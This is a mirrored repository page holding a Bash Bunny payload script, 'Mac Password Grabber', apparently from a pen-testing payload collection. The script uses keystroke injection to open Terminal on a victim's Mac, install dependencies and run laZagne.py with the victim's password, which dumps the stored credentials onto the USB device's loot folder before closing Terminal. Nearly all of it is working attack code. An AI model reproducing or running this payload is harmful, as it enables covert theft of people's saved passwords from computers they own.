mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
* Added MacPass * Update readme.md Co-authored-by: Overtime <39917164+0vertime-dev@users.noreply.github.com>
45 lines
916 B
Bash
45 lines
916 B
Bash
#!/bin/bash
|
|
#
|
|
# Title: Mac Password Grabber
|
|
# Author: Overtimedev
|
|
# Version: 1.0
|
|
#
|
|
# Steals Passwords Mac using laZagne.py then stashes them in /root/udisk/loot/MacPass
|
|
# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)
|
|
#
|
|
# Amber..............Executing payload
|
|
# Green..............Finished
|
|
#
|
|
|
|
LED G R
|
|
ATTACKMODE HID STORAGE
|
|
|
|
lootdir=loot/MacPass
|
|
mkdir -p /root/udisk/$lootdir
|
|
|
|
QUACK GUI SPACE
|
|
QUACK DELAY 1000
|
|
QUACK STRING terminal
|
|
QUACK ENTER
|
|
QUACK DELAY 3000
|
|
QUACK STRING cd /Volumes/BashBunny/
|
|
QUACK ENTER
|
|
QUACK DELAY 1000
|
|
QUACK STRING python get-pip.py
|
|
QUACK ENTER
|
|
QUACK DELAY 3000
|
|
QUACK STRING pip install -r requirements.txt
|
|
QUACK ENTER
|
|
QUACK DELAY 3000
|
|
QUACK STRING python laZagne.py all -password PASSWORD -oN -output loot/MacPass
|
|
QUACK ENTER
|
|
QUACK DELAY 10000
|
|
QUACK STRING killall Terminal
|
|
QUACK ENTER
|
|
|
|
# Sync filesystem
|
|
sync
|
|
|
|
# Green LED for finished
|
|
LED G
|